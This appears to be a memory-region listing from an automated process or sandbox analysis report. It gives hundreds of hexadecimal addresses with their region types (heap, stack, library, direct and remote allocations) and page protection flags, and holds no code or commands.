trusted library allocation
page read and write
2188EBC7000
heap
page read and write
B983000
trusted library allocation
page read and write
78180049C000
trusted library allocation
page read and write
3080000
trusted library allocation
page read and write
7818006AC000
trusted library allocation
page read and write
2188E9B0000
trusted library section
page read and write
781800550000
trusted library allocation
page read and write
781C03324000
trusted library allocation
page read and write
B908000
trusted library allocation
page read and write
781C041C0000
trusted library allocation
page read and write
29880006C000
trusted library allocation
page read and write
82C3000
heap
page read and write
52B0000
trusted library allocation
page read and write
781C03614000
trusted library allocation
page read and write
781800138000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
69B3000
heap
page read and write
80B0000
heap
page read and write
7B7000098000
direct allocation
page read and write
781C04164000
trusted library allocation
page read and write
6C5C000
heap
page read and write
626000
heap
page read and write
21888F9B000
heap
page read and write
781C03958000
trusted library allocation
page read and write
781C0416C000
trusted library allocation
page read and write
8286000
heap
page read and write
781C03844000
trusted library allocation
page read and write
21888F96000
heap
page read and write
BAFE000
trusted library allocation
page read and write
BACD000
trusted library allocation
page read and write
69B9000
heap
page read and write
21888F93000
heap
page read and write
2188EB50000
heap
page read and write
781C034F8000
trusted library allocation
page read and write
6E9C000
trusted library allocation
page read and write
781C03D80000
trusted library allocation
page read and write
69B5000
heap
page read and write
781C02700000
trusted library allocation
page read and write
781C02DF8000
trusted library allocation
page read and write
781800004000
trusted library allocation
page read and write
69B9000
heap
page read and write
781C03F90000
trusted library allocation
page read and write
69B3000
heap
page read and write
6B80000
trusted library allocation
page read and write
B1F0000
heap
page read and write
7488000
trusted library allocation
page read and write
4C29000
trusted library allocation
page read and write
69B9000
heap
page read and write
500F000
heap
page read and write
21888F9B000
heap
page read and write
6CC2000
heap
page read and write
BAF9000
trusted library allocation
page read and write
781C03CF0000
trusted library allocation
page read and write
6C47000
heap
page read and write
4A76000
heap
page read and write
749A000
trusted library allocation
page read and write
BACD000
trusted library allocation
page read and write
6CF3000
heap
page read and write
78180004C000
trusted library allocation
page read and write
5DE000
heap
page read and write
69B7000
heap
page read and write
781C03A74000
trusted library allocation
page read and write
781C0349C000
trusted library allocation
page read and write
69B5000
heap
page read and write
78180051C000
trusted library allocation
page read and write
7818004C0000
trusted library allocation
page read and write
781C03670000
trusted library allocation
page read and write
781C024CC000
trusted library allocation
page read and write
781C02CB0000
trusted library allocation
page read and write
2188EB61000
heap
page read and write
781C03E60000
trusted library allocation
page read and write
6AD0000
remote allocation
page read and write
4E93000
trusted library allocation
page read and write
7818004DC000
trusted library allocation
page read and write
218857F7000
heap
page read and write
2188958D000
heap
page read and write
781C04140000
trusted library allocation
page read and write
7580000
trusted library allocation
page read and write
6F4F000
trusted library allocation
page read and write
2188EBC7000
heap
page read and write
21888F9F000
heap
page read and write
B27000
heap
page read and write
6C2B000
heap
page read and write
21888F9E000
heap
page read and write
575E9FC000
stack
page read and write
57601FD000
stack
page read and write
4488000
heap
page read and write
69C2000
heap
page read and write
2188FE30000
trusted library section
page read and write
781C03A64000
trusted library allocation
page read and write
781C03D38000
trusted library allocation
page read and write
6C42000
heap
page read and write
781C02728000
trusted library allocation
page read and write
6CFB000
heap
page read and write
7B7000114000
direct allocation
page read and write
781C0410C000
trusted library allocation
page read and write
6F4F000
trusted library allocation
page read and write
298800060000
trusted library allocation
page read and write
781C038BC000
trusted library allocation
page read and write
781C00801000
trusted library allocation
page read and write
7B7000104000
direct allocation
page read and write
781C0363C000
trusted library allocation
page read and write
781C02864000
trusted library allocation
page read and write
69B9000
heap
page read and write
30A0000
trusted library allocation
page read and write
75E000
stack
page read and write
7818006C4000
trusted library allocation
page read and write
2188EC08000
heap
page read and write
781C03CDC000
trusted library allocation
page read and write
42FE000
stack
page read and write
B05A000
heap
page read and write
69B9000
heap
page read and write
781C04040000
trusted library allocation
page read and write
69C7000
heap
page read and write
21888F9B000
heap
page read and write
2188EB61000
heap
page read and write
2188EB74000
heap
page read and write
21888F93000
heap
page read and write
69B5000
heap
page read and write
781C02ADC000
trusted library allocation
page read and write
781C02F98000
trusted library allocation
page read and write
781800764000
trusted library allocation
page read and write
6997000
heap
page read and write
75E0000
trusted library allocation
page read and write
B3AD000
heap
page read and write
781C02B70000
trusted library allocation
page read and write
B91A000
trusted library allocation
page read and write
850000
trusted library allocation
page read and write
7810000
trusted library allocation
page read and write
69B3000
heap
page read and write
43BE000
stack
page read and write
2188EBF7000
heap
page read and write
6C30000
heap
page read and write
69B9000
heap
page read and write
51F8000
trusted library allocation
page read and write
781C03960000
trusted library allocation
page read and write
7818006A0000
trusted library allocation
page read and write
69B9000
heap
page read and write
82AB000
heap
page read and write
6CF8000
heap
page read and write
52B0000
trusted library allocation
page read and write
7B7000054000
direct allocation
page read and write
781C02710000
trusted library allocation
page read and write
31A9000
heap
page read and write
781C02864000
trusted library allocation
page read and write
781C02B5C000
trusted library allocation
page read and write
781C035C4000
trusted library allocation
page read and write
BAF0000
trusted library allocation
page read and write
781C04138000
trusted library allocation
page read and write
781C03CA4000
trusted library allocation
page read and write
21888F60000
heap
page read and write
8311000
heap
page read and write
69B9000
heap
page read and write
6E9B000
trusted library allocation
page read and write
575F1FD000
stack
page read and write
781C026DC000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
AC32000
trusted library allocation
page read and write
82FF000
heap
page read and write
781C03A58000
trusted library allocation
page read and write
6C42000
heap
page read and write
781C03980000
trusted library allocation
page read and write
6D43000
heap
page read and write
2188EB74000
heap
page read and write
5AEF000
trusted library allocation
page read and write
781C02728000
trusted library allocation
page read and write
21888F9C000
heap
page read and write
7770000
trusted library allocation
page read and write
781C040A4000
trusted library allocation
page read and write
781C032B8000
trusted library allocation
page read and write
781C02A9C000
trusted library allocation
page read and write
51EA000
heap
page read and write
781C0247C000
trusted library allocation
page read and write
56C5000
trusted library allocation
page read and write
781C0341C000
trusted library allocation
page read and write
69B3000
heap
page read and write
6985000
heap
page read and write
4C5E000
trusted library allocation
page read and write
7078000
heap
page read and write
57529FE000
stack
page read and write
29880007C000
trusted library allocation
page read and write
69B9000
heap
page read and write
781C0227D000
trusted library allocation
page read and write
78180014C000
trusted library allocation
page read and write
B189000
heap
page read and write
2188FC00000
trusted library section
page read and write
69B9000
heap
page read and write
298800029000
trusted library allocation
page read and write
2188EB41000
heap
page read and write
73ED000
stack
page read and write
74A0000
trusted library allocation
page read and write
2188EBF9000
heap
page read and write
69B5000
heap
page read and write
781C00A01000
trusted library allocation
page read and write
21888F95000
heap
page read and write
781C02524000
trusted library allocation
page read and write
6C36000
heap
page read and write
B464000
heap
page read and write
78180057C000
trusted library allocation
page read and write
21888F95000
heap
page read and write
21888F93000
heap
page read and write
6985000
heap
page read and write
69B3000
heap
page read and write
21889546000
heap
page read and write
4FF6000
heap
page read and write
781C03E0C000
trusted library allocation
page read and write
6BE0000
trusted library allocation
page read and write
2188F6D7000
unclassified section
page read and write
21885A10000
heap
page read and write
5AA9000
trusted library allocation
page read and write
8440000
heap
page read and write
781C03770000
trusted library allocation
page read and write
781C026D0000
trusted library allocation
page read and write
8D0000
heap
page execute and read and write
69B9000
heap
page read and write
69B5000
heap
page read and write
781C04058000
trusted library allocation
page read and write
781C02728000
trusted library allocation
page read and write
5F7000
heap
page read and write
727E000
stack
page read and write
781C02774000
trusted library allocation
page read and write
698A000
stack
page read and write
49BF000
stack
page read and write
21888F95000
heap
page read and write
2188EB54000
heap
page read and write
781C03F5C000
trusted library allocation
page read and write
781C03AE8000
trusted library allocation
page read and write
6CA4000
heap
page read and write
71DE000
stack
page read and write
4D10000
heap
page read and write
B145000
heap
page read and write
583E000
trusted library allocation
page read and write
2188EBF7000
heap
page read and write
69B9000
heap
page read and write
BCD1000
trusted library allocation
page read and write
6F3F000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
781C02CA0000
trusted library allocation
page read and write
D0000
heap
page read and write
6CAF000
heap
page read and write
7FEE000
stack
page read and write
E10000
heap
page read and write
781C036A8000
trusted library allocation
page read and write
437E000
stack
page read and write
6E94000
trusted library allocation
page read and write
781C03A34000
trusted library allocation
page read and write
781C03AEC000
trusted library allocation
page read and write
7818005BC000
trusted library allocation
page read and write
6C9000
heap
page read and write
43E000
stack
page read and write
7A0000
heap
page read and write
781C02868000
trusted library allocation
page read and write
69B3000
heap
page read and write
69B9000
heap
page read and write
6F4F000
trusted library allocation
page read and write
2188EB53000
heap
page read and write
31AC000
heap
page read and write
781C0235C000
trusted library allocation
page read and write
BACD000
trusted library allocation
page read and write
69B9000
heap
page read and write
7818000DC000
trusted library allocation
page read and write
504E000
stack
page read and write
6C20000
heap
page execute and read and write
BB05000
trusted library allocation
page read and write
526E000
trusted library allocation
page read and write
BAF9000
trusted library allocation
page read and write
86E4000
heap
page read and write
781C02592000
trusted library allocation
page read and write
6C43000
heap
page read and write
BAFC000
trusted library allocation
page read and write
300E000
stack
page read and write
781C02590000
trusted library allocation
page read and write
6C5A000
heap
page read and write
B40C000
heap
page read and write
218857C0000
heap
page read and write
781C02868000
trusted library allocation
page read and write
2988000F0000
trusted library allocation
page read and write
781C032EC000
trusted library allocation
page read and write
781C023AC000
trusted library allocation
page read and write
69B1000
heap
page read and write
21888F9E000
heap
page read and write
7091000
heap
page read and write
69B3000
heap
page read and write
21888F95000
heap
page read and write
781C03770000
trusted library allocation
page read and write
B361000
heap
page read and write
781C026B8000
trusted library allocation
page read and write
781C03914000
trusted library allocation
page read and write
6160000
trusted library allocation
page read and write
781C02804000
trusted library allocation
page read and write
7029000
heap
page read and write
781C02664000
trusted library allocation
page read and write
781C04088000
trusted library allocation
page read and write
69B9000
heap
page read and write
6F4F000
trusted library allocation
page read and write
781C03714000
trusted library allocation
page read and write
7590000
trusted library section
page read and write
6CCE000
heap
page read and write
781C02568000
trusted library allocation
page read and write
69CF000
heap
page read and write
69B5000
heap
page read and write
6C30000
heap
page read and write
4C2E000
trusted library allocation
page read and write
781C03700000
trusted library allocation
page read and write
781C03928000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
781C04038000
trusted library allocation
page read and write
69B3000
heap
page read and write
78180064C000
trusted library allocation
page read and write
781C02E20000
trusted library allocation
page read and write
52B0000
trusted library allocation
page read and write
69B3000
heap
page read and write
74C3000
trusted library allocation
page read and write
781C02FC8000
trusted library allocation
page read and write
7818000C4000
trusted library allocation
page read and write
69B3000
heap
page read and write
781C0361C000
trusted library allocation
page read and write
6C34000
heap
page read and write
92B000
trusted library allocation
page read and write
781C024D4000
trusted library allocation
page read and write
74AE000
stack
page read and write
781C03DEC000
trusted library allocation
page read and write
781C03B38000
trusted library allocation
page read and write
6050000
heap
page read and write
781C03DE0000
trusted library allocation
page read and write
781800494000
trusted library allocation
page read and write
6D6B000
heap
page read and write
2188EBC7000
heap
page read and write
7818005C0000
trusted library allocation
page read and write
72DE000
stack
page read and write
781C03C9C000
trusted library allocation
page read and write
4C6B000
trusted library allocation
page read and write
6C5C000
heap
page read and write
781C02390000
trusted library allocation
page read and write
781C040D4000
trusted library allocation
page read and write
B15000
trusted library allocation
page execute and read and write
57531FA000
stack
page read and write
8100000
trusted library allocation
page read and write
9FE000
stack
page read and write
51D0000
heap
page read and write
781C04080000
trusted library allocation
page read and write
61B000
heap
page read and write
781C040D8000
trusted library allocation
page read and write
69B9000
heap
page read and write
6971000
heap
page read and write
781C02EA4000
trusted library allocation
page read and write
2988000DC000
trusted library allocation
page read and write
6971000
heap
page read and write
7C8000
heap
page read and write
781C027A0000
trusted library allocation
page read and write
781C024B8000
trusted library allocation
page read and write
69B9000
heap
page read and write
69B5000
heap
page read and write
2188EB84000
heap
page read and write
21888F9D000
heap
page read and write
57659FD000
stack
page read and write
5C33000
trusted library allocation
page read and write
69B3000
heap
page read and write
781C0232C000
trusted library allocation
page read and write
298800090000
trusted library allocation
page read and write
781C040B0000
trusted library allocation
page read and write
781C0231C000
trusted library allocation
page read and write
7730000
heap
page read and write
781C0408C000
trusted library allocation
page read and write
6F30000
trusted library allocation
page read and write
80A0000
trusted library allocation
page execute and read and write
6E8A000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
B1BC000
heap
page read and write
218894E2000
heap
page read and write
781C026F4000
trusted library allocation
page read and write
781C024A8000
trusted library allocation
page read and write
2188FDF7000
unclassified section
page read and write
69B3000
heap
page read and write
6C58000
heap
page read and write
837C000
stack
page read and write
21888F95000
heap
page read and write
52D0000
trusted library allocation
page read and write
781C02664000
trusted library allocation
page read and write
781C02CA0000
trusted library allocation
page read and write
781C03E3C000
trusted library allocation
page read and write
781C03D3C000
trusted library allocation
page read and write
77A0000
trusted library allocation
page read and write
781C03F80000
trusted library allocation
page read and write
69B5000
heap
page read and write
B983000
trusted library allocation
page read and write
6C4B000
heap
page read and write
6CB3000
heap
page read and write
2188FBF0000
trusted library section
page read and write
2188EBFB000
heap
page read and write
520C000
trusted library allocation
page read and write
781C02F50000
trusted library allocation
page read and write
B171000
heap
page read and write
69B9000
heap
page read and write
6C0F000
stack
page read and write
781C024B4000
trusted library allocation
page read and write
781C031CC000
trusted library allocation
page read and write
6CFF000
heap
page read and write
7520000
trusted library allocation
page read and write
6E40000
trusted library allocation
page execute and read and write
21888F9B000
heap
page read and write
6A4E000
stack
page read and write
781C02670000
trusted library allocation
page read and write
781C02E14000
trusted library allocation
page read and write
7457000
trusted library allocation
page read and write
69B9000
heap
page read and write
69B9000
heap
page read and write
6C42000
heap
page read and write
781C02864000
trusted library allocation
page read and write
781C026C4000
trusted library allocation
page read and write
781C04130000
trusted library allocation
page read and write
21888F83000
heap
page read and write
604E000
stack
page read and write
781C03D54000
trusted library allocation
page read and write
781C03994000
trusted library allocation
page read and write
49FE000
stack
page read and write
2188EBA8000
heap
page read and write
6FCB000
heap
page read and write
21888F98000
heap
page read and write
6CB9000
heap
page read and write
6CAA000
heap
page read and write
B095000
heap
page read and write
7090000
trusted library allocation
page execute and read and write
781C040AC000
trusted library allocation
page read and write
2188585C000
heap
page read and write
BB01000
trusted library allocation
page read and write
6C27000
heap
page read and write
21888FA3000
heap
page read and write
69B3000
heap
page read and write
781C034CC000
trusted library allocation
page read and write
2188EB37000
heap
page read and write
781C02B20000
trusted library allocation
page read and write
781C02300000
trusted library allocation
page read and write
13C000
stack
page read and write
A251000
trusted library allocation
page read and write
781C02404000
trusted library allocation
page read and write
69B9000
heap
page read and write
31AC000
heap
page read and write
781800654000
trusted library allocation
page read and write
2188EB61000
heap
page read and write
781C02594000
trusted library allocation
page read and write
2B8E000
stack
page read and write
4C00000
heap
page read and write
69BA000
heap
page read and write
6F3F000
trusted library allocation
page read and write
DF9000
trusted library allocation
page read and write
781C03714000
trusted library allocation
page read and write
218894DC000
heap
page read and write
218894A0000
heap
page read and write
2188EB2E000
heap
page read and write
69B3000
heap
page read and write
781C04034000
trusted library allocation
page read and write
179000
stack
page read and write
781C0411C000
trusted library allocation
page read and write
B02D000
heap
page read and write
6C3F000
heap
page read and write
69B1000
heap
page read and write
781C03584000
trusted library allocation
page read and write
57641FD000
stack
page read and write
69B3000
heap
page read and write
B983000
trusted library allocation
page read and write
57549F9000
stack
page read and write
AC0000
trusted library section
page read and write
69B7000
heap
page read and write
802C000
stack
page read and write
2188952A000
heap
page read and write
526E000
trusted library allocation
page read and write
6F50000
trusted library allocation
page read and write
7818000E4000
trusted library allocation
page read and write
6CAA000
heap
page read and write
5D0000
heap
page read and write
7B7000001000
direct allocation
page read and write
6B75000
trusted library allocation
page read and write
78180006C000
trusted library allocation
page read and write
781C03A01000
trusted library allocation
page read and write
781C02888000
trusted library allocation
page read and write
781C03D94000
trusted library allocation
page read and write
B444000
heap
page read and write
781C0243C000
trusted library allocation
page read and write
83F0000
trusted library allocation
page read and write
575A1FE000
stack
page read and write
4C66000
trusted library allocation
page read and write
781C03810000
trusted library allocation
page read and write
566000
heap
page read and write
781C03D34000
trusted library allocation
page read and write
781C03DA0000
trusted library allocation
page read and write
781800154000
trusted library allocation
page read and write
781C03DCC000
trusted library allocation
page read and write
69B3000
heap
page read and write
6CE0000
heap
page read and write
69BD000
heap
page read and write
4420000
heap
page read and write
781C026DC000
trusted library allocation
page read and write
781C03858000
trusted library allocation
page read and write
781C02DB4000
trusted library allocation
page read and write
781800180000
trusted library allocation
page read and write
73AE000
stack
page read and write
781C02BF8000
trusted library allocation
page read and write
781C03D90000
trusted library allocation
page read and write
781C03974000
trusted library allocation
page read and write
6C5A000
heap
page read and write
781C03648000
trusted library allocation
page read and write
781C040F0000
trusted library allocation
page read and write
583F000
stack
page read and write
B077000
heap
page read and write
6FFE000
stack
page read and write
781C03530000
trusted library allocation
page read and write
6985000
heap
page read and write
69B9000
heap
page read and write
69B3000
heap
page read and write
57671FB000
stack
page read and write
B908000
trusted library allocation
page read and write
57F9000
trusted library allocation
page read and write
21888F9B000
heap
page read and write
781C03CC0000
trusted library allocation
page read and write
6D0E000
heap
page read and write
69E000
stack
page read and write
781C02728000
trusted library allocation
page read and write
B180000
heap
page read and write
57581FD000
stack
page read and write
21889583000
heap
page read and write
6E94000
trusted library allocation
page read and write
781800488000
trusted library allocation
page read and write
69B9000
heap
page read and write
781C02CC4000
trusted library allocation
page read and write
5D8000
heap
page read and write
6C9B000
heap
page read and write
6E90000
trusted library allocation
page read and write
69AE000
heap
page read and write
781C032FC000
trusted library allocation
page read and write
781C03C78000
trusted library allocation
page read and write
781C03F38000
trusted library allocation
page read and write
6A0000
heap
page read and write
6961000
heap
page read and write
B15A000
heap
page read and write
781C03438000
trusted library allocation
page read and write
BB00000
trusted library allocation
page read and write
5009000
heap
page read and write
B077000
heap
page read and write
21888F98000
heap
page read and write
781C032B8000
trusted library allocation
page read and write
BB04000
trusted library allocation
page read and write
B010000
heap
page read and write
781800614000
trusted library allocation
page read and write
7800000
trusted library allocation
page read and write
8160000
heap
page read and write
781C02378000
trusted library allocation
page read and write
21888F9F000
heap
page read and write
781C03594000
trusted library allocation
page read and write
21888F9B000
heap
page read and write
6E8C000
trusted library allocation
page read and write
781C03824000
trusted library allocation
page read and write
6CC7000
heap
page read and write
21888F90000
heap
page read and write
298800064000
trusted library allocation
page read and write
781C036D4000
trusted library allocation
page read and write
781C03E04000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
69B3000
heap
page read and write
858D000
stack
page read and write
57609FE000
stack
page read and write
21888F9F000
heap
page read and write
781C04120000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
86D000
trusted library allocation
page execute and read and write
2188EB24000
heap
page read and write
81D9000
heap
page read and write
781C023E0000
trusted library allocation
page read and write
781C03464000
trusted library allocation
page read and write
781C0392C000
trusted library allocation
page read and write
6E89000
trusted library allocation
page read and write
3086000
trusted library allocation
page read and write
781C0233C000
trusted library allocation
page read and write
2188EBF8000
heap
page read and write
8182000
heap
page read and write
725E000
stack
page read and write
781C03410000
trusted library allocation
page read and write
69B9000
heap
page read and write
4B46000
trusted library allocation
page read and write
B190000
heap
page read and write
781C02A28000
trusted library allocation
page read and write
69B3000
heap
page read and write
69B9000
heap
page read and write
781C04024000
trusted library allocation
page read and write
69B9000
heap
page read and write
4836000
trusted library allocation
page read and write
5AA4000
trusted library allocation
page read and write
6F3F000
trusted library allocation
page read and write
52D0000
trusted library allocation
page read and write
218891E0000
heap
page read and write
B02000
trusted library allocation
page read and write
781C02710000
trusted library allocation
page read and write
69B9000
heap
page read and write
781C02494000
trusted library allocation
page read and write
781C02484000
trusted library allocation
page read and write
7B70000CC000
direct allocation
page read and write
2188F7E7000
unclassified section
page read and write
574F9FE000
unkown
page read and write
781C02734000
trusted library allocation
page read and write
69B5000
heap
page read and write
6AD000
heap
page read and write
781C0234C000
trusted library allocation
page read and write
69B9000
heap
page read and write
781C041A4000
trusted library allocation
page read and write
B1BC000
heap
page read and write
781C03014000
trusted library allocation
page read and write
747D000
trusted library allocation
page read and write
69B9000
heap
page read and write
6DBB000
heap
page read and write
50000
heap
page read and write
7B7000040000
direct allocation
page read and write
69B9000
heap
page read and write
69B3000
heap
page read and write
781C02B88000
trusted library allocation
page read and write
BC30000
trusted library allocation
page read and write
781C03710000
trusted library allocation
page read and write
6F4F000
trusted library allocation
page read and write
78180066C000
trusted library allocation
page read and write
781C02368000
trusted library allocation
page read and write
6AD0000
remote allocation
page read and write
2188F460000
trusted library section
page read and write
6E90000
trusted library allocation
page read and write
6D84000
heap
page read and write
8360000
heap
page read and write
6C57000
heap
page read and write
8247000
heap
page read and write
781C03A40000
trusted library allocation
page read and write
781C03568000
trusted library allocation
page read and write
2188EBDB000
heap
page read and write
6F4F000
trusted library allocation
page read and write
69B9000
heap
page read and write
781C03C04000
trusted library allocation
page read and write
2188EB50000
heap
page read and write
69B5000
heap
page read and write
781C040A8000
trusted library allocation
page read and write
7818004EC000
trusted library allocation
page read and write
895000
trusted library allocation
page execute and read and write
B983000
trusted library allocation
page read and write
487D000
stack
page read and write
52A0000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
4AFE000
stack
page read and write
6D65000
heap
page read and write
7818005CC000
trusted library allocation
page read and write
69B3000
heap
page read and write
781C03B1C000
trusted library allocation
page read and write
6CD8000
heap
page read and write
781C03830000
trusted library allocation
page read and write
781C0327C000
trusted library allocation
page read and write
781C03FB0000
trusted library allocation
page read and write
C6D1000
trusted library allocation
page read and write
781C03844000
trusted library allocation
page read and write
69B9000
heap
page read and write
21888F93000
heap
page read and write
69B3000
heap
page read and write
6F4F000
trusted library allocation
page read and write
69B5000
heap
page read and write
781C037E0000
trusted library allocation
page read and write
8747000
heap
page read and write
6E94000
trusted library allocation
page read and write
31CB000
heap
page read and write
2188EB77000
heap
page read and write
2188D410000
trusted library section
page read and write
781C03470000
trusted library allocation
page read and write
781C0365C000
trusted library allocation
page read and write
2188EB54000
heap
page read and write
74DF000
trusted library allocation
page read and write
587E000
stack
page read and write
711E000
stack
page read and write
781C02BC0000
trusted library allocation
page read and write
69C7000
heap
page read and write
781C04134000
trusted library allocation
page read and write
781C03420000
trusted library allocation
page read and write
6ABC000
stack
page read and write
BAFB000
trusted library allocation
page read and write
51FE000
trusted library allocation
page read and write
21888F91000
heap
page read and write
E10000
heap
page execute and read and write
78180073C000
trusted library allocation
page read and write
781800660000
trusted library allocation
page read and write
781C03D10000
trusted library allocation
page read and write
6B90000
trusted library allocation
page read and write
781C00401000
trusted library allocation
page read and write
6C7E000
stack
page read and write
6C28000
heap
page read and write
69B5000
heap
page read and write
781C03CA8000
trusted library allocation
page read and write
4FF4000
heap
page read and write
69B9000
heap
page read and write
4E72000
trusted library allocation
page read and write
781C03D8C000
trusted library allocation
page read and write
781C03D50000
trusted library allocation
page read and write
83FD000
stack
page read and write
781C03A94000
trusted library allocation
page read and write
69B5000
heap
page read and write
781C03AFC000
trusted library allocation
page read and write
6F4F000
trusted library allocation
page read and write
21888F9B000
heap
page read and write
69B5000
heap
page read and write
4AE5000
trusted library allocation
page read and write
781C03FE8000
trusted library allocation
page read and write
AF9000
trusted library allocation
page read and write
6E86000
trusted library allocation
page read and write
6E94000
trusted library allocation
page read and write
6C3E000
heap
page read and write
781C02AD0000
trusted library allocation
page read and write
69B3000
heap
page read and write
70E3000
trusted library allocation
page read and write
BB50000
trusted library allocation
page read and write
6966000
heap
page read and write
21888F9F000
heap
page read and write
2188EBB7000
heap
page read and write
781C03B48000
trusted library allocation
page read and write
69B9000
heap
page read and write
781C025C4000
trusted library allocation
page read and write
781C0243C000
trusted library allocation
page read and write
8326000
heap
page read and write
781C03610000
trusted library allocation
page read and write
21888F9B000
heap
page read and write
4EA2000
trusted library allocation
page read and write
781C02CB0000
trusted library allocation
page read and write
6C4D000
heap
page read and write
2188EC0C000
heap
page read and write
781C02418000
trusted library allocation
page read and write
781800538000
trusted library allocation
page read and write
781C0248C000
trusted library allocation
page read and write
781C026D0000
trusted library allocation
page read and write
21885AD0000
heap
page read and write
6C30000
heap
page read and write
781C02418000
trusted library allocation
page read and write
781C03705000
trusted library allocation
page read and write
31CB000
heap
page read and write
6F3F000
trusted library allocation
page read and write
2988000C0000
trusted library allocation
page read and write
781C02460000
trusted library allocation
page read and write
7B700000D000
direct allocation
page read and write
69B9000
heap
page read and write
781800218000
trusted library allocation
page read and write
69B9000
heap
page read and write
781C03FD8000
trusted library allocation
page read and write
781800401000
trusted library allocation
page read and write
2188EB77000
heap
page read and write
C05C000
stack
page read and write
4BD8000
trusted library allocation
page read and write
781C02CC7000
trusted library allocation
page read and write
69B3000
heap
page read and write
2188EBD0000
heap
page read and write
2188EBA6000
heap
page read and write
AF0000
trusted library allocation
page read and write
781C02CD4000
trusted library allocation
page read and write
2188CF22000
trusted library allocation
page read and write
7466000
trusted library allocation
page read and write
781C037F0000
trusted library allocation
page read and write
781C029F4000
trusted library allocation
page read and write
6CA2000
heap
page read and write
6971000
heap
page read and write
781C02568000
trusted library allocation
page read and write
2188EB74000
heap
page read and write
7F90000
trusted library allocation
page read and write
B08E000
heap
page read and write
340E000
stack
page read and write
21888F9F000
heap
page read and write
781C040A0000
trusted library allocation
page read and write
69B9000
heap
page read and write
7540000
trusted library allocation
page read and write
B12000
trusted library allocation
page read and write
781C03494000
trusted library allocation
page read and write
69B5000
heap
page read and write
B983000
trusted library allocation
page read and write
78180003C000
trusted library allocation
page read and write
781C00001000
trusted library allocation
page read and write
781C03948000
trusted library allocation
page read and write
4C3F000
trusted library allocation
page read and write
7E0000
heap
page read and write
781C03DF0000
trusted library allocation
page read and write
6C35000
heap
page read and write
8681000
heap
page read and write
781C02700000
trusted library allocation
page read and write
69B7000
heap
page read and write
AE0000
trusted library allocation
page read and write
781C036C0000
trusted library allocation
page read and write
781C03810000
trusted library allocation
page read and write
69B3000
heap
page read and write
69B3000
heap
page read and write
6F3F000
trusted library allocation
page read and write
781C0358F000
trusted library allocation
page read and write
2188EBF7000
heap
page read and write
781C0400C000
trusted library allocation
page read and write
78180003D000
trusted library allocation
page read and write
781C03680000
trusted library allocation
page read and write
BAF9000
trusted library allocation
page read and write
2188EB54000
heap
page read and write
69B9000
heap
page read and write
2188EB74000
heap
page read and write
FB000
stack
page read and write
69B3000
heap
page read and write
892000
trusted library allocation
page read and write
8CF000
stack
page read and write
21888F85000
heap
page read and write
781C02204000
trusted library allocation
page read and write
B7AE000
trusted library allocation
page read and write
2188EB76000
heap
page read and write
69B3000
heap
page read and write
781C03A64000
trusted library allocation
page read and write
4B21000
trusted library allocation
page read and write
30F7000
heap
page read and write
781C041B4000
trusted library allocation
page read and write
69B9000
heap
page read and write
781C02260000
trusted library allocation
page read and write
2188EB4B000
heap
page read and write
69B3000
heap
page read and write
781C037B8000
trusted library allocation
page read and write
781C03518000
trusted library allocation
page read and write
69B3000
heap
page read and write
781C040CC000
trusted library allocation
page read and write
781C02590000
trusted library allocation
page read and write
781C03CCC000
trusted library allocation
page read and write
69B9000
heap
page read and write
781C02404000
trusted library allocation
page read and write
6CFF000
stack
page read and write
2188EB61000
heap
page read and write
781800534000
trusted library allocation
page read and write
218894D8000
heap
page read and write
2BCD000
stack
page read and write
B983000
trusted library allocation
page read and write
6C82000
heap
page read and write
8243000
heap
page read and write
218894F4000
heap
page read and write
6C42000
heap
page read and write
4C1A000
trusted library allocation
page read and write
6A90000
heap
page read and write
2188EBA7000
heap
page read and write
218859A0000
heap
page read and write
781C037A8000
trusted library allocation
page read and write
2988000EC000
trusted library allocation
page read and write
781800604000
trusted library allocation
page read and write
781C02310000
trusted library allocation
page read and write
781C02D48000
trusted library allocation
page read and write
89CC000
stack
page read and write
7500000
trusted library allocation
page read and write
781C0358C000
trusted library allocation
page read and write
E20000
trusted library allocation
page read and write
781C023C8000
trusted library allocation
page read and write
6CB2000
heap
page read and write
7530000
trusted library allocation
page read and write
781800158000
trusted library allocation
page read and write
6D6000
heap
page read and write
781C04090000
trusted library allocation
page read and write
781C00D2E000
trusted library allocation
page read and write
B1DA000
heap
page read and write
57611FC000
stack
page read and write
6C60000
trusted library allocation
page execute and read and write
21885842000
heap
page read and write
B45B000
heap
page read and write
6CE0000
heap
page read and write
781C03914000
trusted library allocation
page read and write
7818005B0000
trusted library allocation
page read and write
781C026D0000
trusted library allocation
page read and write
2188EC1A000
heap
page read and write
781C03CC4000
trusted library allocation
page read and write
29880002C000
trusted library allocation
page read and write
6F4F000
trusted library allocation
page read and write
69B5000
heap
page read and write
6B0000
trusted library allocation
page execute and read and write
B91A000
trusted library allocation
page read and write
B85A000
trusted library allocation
page read and write
69B3000
heap
page read and write
48BE000
stack
page read and write
781C03DC8000
trusted library allocation
page read and write
21887FC0000
unkown
page read and write
69B9000
heap
page read and write
781C022F0000
trusted library allocation
page read and write
781C02CBC000
trusted library allocation
page read and write
6C58000
heap
page read and write
2188EB3A000
heap
page read and write
6C58000
heap
page read and write
781C028A8000
trusted library allocation
page read and write
2188FBE7000
unclassified section
page read and write
BC03000
trusted library allocation
page read and write
57651FD000
stack
page read and write
B7AE000
trusted library allocation
page read and write
69B5000
heap
page read and write
B91A000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
B3EF000
heap
page read and write
57621FD000
stack
page read and write
2188EBB7000
heap
page read and write
BF5B000
stack
page read and write
781C0385C000
trusted library allocation
page read and write
69B5000
heap
page read and write
781C03930000
trusted library allocation
page read and write
6CD3000
heap
page read and write
781C03DC4000
trusted library allocation
page read and write
6E90000
trusted library allocation
page read and write
B00000
trusted library allocation
page read and write
781C025C8000
trusted library allocation
page read and write
6E8E000
trusted library allocation
page read and write
47D1000
trusted library allocation
page read and write
7818005EC000
trusted library allocation
page read and write
781C03201000
trusted library allocation
page read and write
51E0000
heap
page read and write
6E94000
trusted library allocation
page read and write
2188EB2E000
heap
page read and write
781C036C8000
trusted library allocation
page read and write
781C037D0000
trusted library allocation
page read and write
6C3E000
heap
page read and write
21888F9B000
heap
page read and write
B983000
trusted library allocation
